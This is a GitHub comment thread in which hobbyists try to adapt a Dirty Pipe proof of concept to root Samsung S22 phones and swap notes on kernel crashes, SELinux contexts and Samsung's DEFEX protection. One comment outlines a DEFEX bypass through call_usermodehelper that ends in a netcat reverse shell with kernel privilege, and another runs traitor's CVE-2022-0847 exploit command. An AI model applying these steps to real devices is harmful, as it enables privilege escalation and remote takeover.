Try this version if you succeeded to run debug1-3. If this version still reboot the device, there is something wrong on kernel module.

Yep, kernel panic/crash on my S22 Ultra

@sac23
Copy link

sac23 commented Jun 16, 2022

how please can u share @Tahadergan

@jojos38
Copy link

jojos38 commented Jun 17, 2022

Sad, I updated to the version which disallow rolling back the kernel version
I mean, would we be able to use OTA anyway with such method? Or would we be stuck on the version where the breach was still doable

@yunasc
Copy link

yunasc commented Jun 19, 2022

Done root s22 ultra

Nice one! I'm on the same kernel with S22+ (S906B).
Will it work?

Looking forward for the details about the method(s).

@bklynali
Copy link

bklynali commented Jun 20, 2022

Done root s22 ultra

Nice. Can you please share how?

@elliwigy
Copy link

Done root s22 ultra

Nice one! I'm on the same kernel with S22+ (S906B). Will it work?

Looking forward for the details about the method(s).

I highly doubt theyll share anything.. dunno y even post really as they have no intentions to share how

@oakieville
Copy link
Author

Interesting his context is vender_modprobe

@elliwigy
Copy link

elliwigy commented Jun 27, 2022

Interesting his context is vender_modprobe

So is the original poc lol

if u look at screenshot on main screen you will see its also vendor_modprobe context

@oakieville
Copy link
Author

oakieville commented Jun 27, 2022

Interesting his context is vender_modprobe

So is the original poc lol

if u look at screenshot on main screen you will see its also vendor_modprobe context

So is that where its failing for us cause for me it is not vender_modprobe context when running commands in shell. The poc code runs as vender_modprobe to do the module but running uname is not

@oakieville
Copy link
Author

Think i for most part lost interest in this sucks dude figured it out but didnt share and i simply lack the skill to do it im hoping on elliwigy figuring it out

@elliwigy
Copy link

Interesting his context is vender_modprobe

So is the original poc lol
if u look at screenshot on main screen you will see its also vendor_modprobe context

So is that where its failing for us cause for me it is not vender_modprobe context when running commands in shell. The poc code runs as vender_modprobe to do the module but running uname is not

thats because it doesn't work/fully execute for us due to defex.. if it ran all the way through it would be in vendor_modprobe context.. with permissive you can change to that context but it doesnt do much for us unfortunately

@oakieville
Copy link
Author

Yeah and not looking like he wants to share his trick either

@jojos38
Copy link

jojos38 commented Jul 8, 2022

There was a new security breach discovered, apparently similar to Dirty Pipe, maybe this could be exploitable if someone finds more information on it?
https://game-news24.com/2022/07/06/the-galaxy-s22-series-has-the-new-security-vulnerabilities/

@elliwigy
Copy link

elliwigy commented Jul 9, 2022

There was a new security breach discovered, apparently similar to Dirty Pipe, maybe this could be exploitable if someone finds more information on it? https://game-news24.com/2022/07/06/the-galaxy-s22-series-has-the-new-security-vulnerabilities/

doesnt help much right now at all lol..probably be months before we see any details and its patched.

@k0mraid3
Copy link

Basically it should work by similar procedure. Need some modifications like:

  1. Fix function offset of libc++.so
  2. Choose proper library file to overwrite
  3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

Im intrested. ive actually started a thread on XDA here: https://forum.xda-developers.com/t/open-dev-bruteroot-a-collection-of-root-tactics-possibly-force-bootloader-unlock-on-na-samsung-s22.4468083/page-2#post-87167275

But im aiming to compile as many methods as possible to escalate priv into an apk. trying to drum up support and get help because apks arent my thing.

@elliwigy
Copy link

Basically it should work by similar procedure. Need some modifications like:

  1. Fix function offset of libc++.so
  2. Choose proper library file to overwrite
  3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

Im intrested. ive actually started a thread on XDA here: https://forum.xda-developers.com/t/open-dev-bruteroot-a-collection-of-root-tactics-possibly-force-bootloader-unlock-on-na-samsung-s22.4468083/page-2#post-87167275

But im aiming to compile as many methods as possible to escalate priv into an apk. trying to drum up support and get help because apks arent my thing.

Not sure how much you read so far but we already have a working version of this PoC. It sets permissive but after viewing logs it appears defex is preventing root. So the PoC works but in order to gain root we need to somehow stop defex or bypass it etc. to gain root.

@bigjohn828
Copy link

bigjohn828 commented Jul 31, 2022

Can this work?

DEFEX Bypass

As we saw above part, just calling call_usermodehelper doesn't work due to newly updated DEFEX. But, ueventd is root privileged process and its parent process is init process. And also it is not protected by DEFEX.

As similar to the way we bypass SELinux restriction, to bypass new DEFEX, all we need to do is calling call_usermodehelper's subroutines separately in ueventd process.

Set call_usermodehelper_setup's arguments in kernel memory via arbitrary kernel write primitive.
Call call_usermodehelper_setup with our arguments via arbitrary kernel function call primitive.
Read and Copy system_unbound_wq and sub_info data.
Call queue_work with copied system_unbound_wq and sub_info.
Due to DEFEX check in do_execve, we use shellscript like /system/bin/sh -c "while [ 1 ] ; do /system/bin/toybox nc ..." because /system/bin/sh has feature_safeplace_path attribute.
In this way, we can get reverse shell from remote server with full kernel privilege.

@elliwigy
Copy link

You try it yet? lol

@bigjohn828
Copy link

Ya got root, didn't you? Lol

@bigjohn828
Copy link

bigjohn828 commented Aug 16, 2022

Taha Dergan, pls share with us your knowledge. You will be a legend

@bigjohn828
Copy link

I apologize, deleted

@Tahadergan
Copy link

I apologize, deleted

Message me on Twitter

@oakieville
Copy link
Author

Ya got root, didn't you? Lol

So share bro or you just here to brag

@bigjohn828
Copy link

bigjohn828 commented Aug 17, 2022 via email

@elliwigy
Copy link

I apologize, deleted

Message me on Twitter

Why? You don't ever respond...

@thunderwolf66102
Copy link

Curious - I can run the beta-4 release on my S22 Ultra and then I can subsequently run Traitor (https://github.com/liamg/traitor) which is then able to detect the dirty pipe vuln where it was not able to do so before. If I run the beta-4 release again, the unit will soft reboot and I will have to run it again before Traitor will recognize dirty pipe again.

Running ./traitor-arm64 --exploit kernel:CVE-2022-0847 from an adb shell seems to work but states that 'Exploit failed: unexpected data in /etc/passwd'

@elliwigy
Copy link

Curious - I can run the beta-4 release on my S22 Ultra and then I can subsequently run Traitor (https://github.com/liamg/traitor) which is then able to detect the dirty pipe vuln where it was not able to do so before. If I run the beta-4 release again, the unit will soft reboot and I will have to run it again before Traitor will recognize dirty pipe again.

Running ./traitor-arm64 --exploit kernel:CVE-2022-0847 from an adb shell seems to work but states that 'Exploit failed: unexpected data in /etc/passwd'

That is normal behavior (not sure about traitor)

@oakieville
Copy link
Author

Curious - I can run the beta-4 release on my S22 Ultra and then I can subsequently run Traitor (https://github.com/liamg/traitor) which is then able to detect the dirty pipe vuln where it was not able to do so before. If I run the beta-4 release again, the unit will soft reboot and I will have to run it again before Traitor will recognize dirty pipe again.

Running ./traitor-arm64 --exploit kernel:CVE-2022-0847 from an adb shell seems to work but states that 'Exploit failed: unexpected data in /etc/passwd'

etc/passwd is for the linux version if you look at orig dirtypipe and android dirtypipe you see what i mean pc one uses etc/passwd android one overwrites a .so

@thunderwolf66102
Copy link

thunderwolf66102 commented Sep 30, 2022 via email

@Nesqu1k2020
Copy link

Anyone got root ? Or never finished?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests